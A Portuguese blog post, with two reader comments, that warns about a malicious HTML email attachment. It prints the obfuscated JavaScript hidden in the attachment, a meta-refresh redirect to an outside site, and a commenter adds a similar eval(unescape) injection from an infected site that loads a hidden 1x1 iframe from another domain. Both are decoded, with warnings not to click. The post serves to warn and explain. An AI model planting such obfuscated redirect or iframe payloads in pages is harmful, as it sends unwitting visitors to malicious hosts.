[BUZZ] Até clicar em arquivos HTML está perigoso

Hoje eu recebi duas mensagens muito estranhas, que passaram pelo filtro do Gmail, com um anexo em HTML. Visualizando o anexo no Google Docs parecia perfeitamente “seguro”, mas eu sabia que se tratava de alguma pilantragem. Salvei o anexo no HDD e dei uma olhada no código fonte.

Entre uma frase e outra visível, isso estava escondido:

<script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape(‘%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A’))</script>

Eu não tive paciência para decodificar tudo, mas se você tiver alguma noção de caracteres de escape e olhar com cuidado após “unescape” verá que isso começa injetando no browser “<meta http equiv refresh…”

Ou seja, é pilantragem mesmo. Não sei ainda o objetivo, mas até clicar em arquivos html está perigoso.


Liked by: Henzo M. F. Gomes, Roberto Acioli

VN:R_U [1.9.13_1145]
Rating: 0.0/5 (0 votes cast)
2 comentários
  • Jefferson - 6.106 Comentários

    Descobri como "ler" o que está escrito aí sem esforço. Basta colar o texto de unescape nesta página:

    http://www.linkedresources.com/tools/unescaper_v0.2b1.html

    E clicar em unescape. O resultado é este (não clique nos links!):

    <meta http-equiv="refresh" content="0;url=http://graduationoutfitters.co.za/1.html" />

    <table width="100%" border="0"><tr bgcolor="#556688" align="center"><td><a href="http://www.pullsoft.com/htmlpower.htm"><font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">This Web Page was protected by HTMLPower, Click here to Register</font></a></td></tr></table>

    O engraçado é que tudo dentro de <table> </table> parece ter sido inserido por acidente. Script-kiddie em ação?

    Fazer seu browser dar um refresh e abrir "graduationoutfitters.co.za" (não clique!) é que é a parte perigosa da coisa.

    VN:R_U [1.9.13_1145]
    Rating: 0.0/5 (0 votes cast)
  • eu recebi um email do google ferramentas para webmaster que um site meu bem antigo tinha sido infectado, e o código também estava desse jeito, veja:

    <script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%35%35%33%34%33%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>

    descriptografando fica assim:

    <script>eval(unescape('document.write('<iframe src="http://podfer.com/?555343" width=1 height=1></iframe>')'));</script>

    como ja foi dito: NÃO CLIQUEM NOS LINKS ^^

    VA:R_U [1.9.13_1145]
    Rating: 0.0/5 (0 votes cast)

Deixe um comentário para Kaio Maia S.O. Cancelar resposta

Siga as Regras de Participação, ou seu comentário será ignorado.

Não faça comentários sem relação com os posts. Comente neste post para assuntos genéricos

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »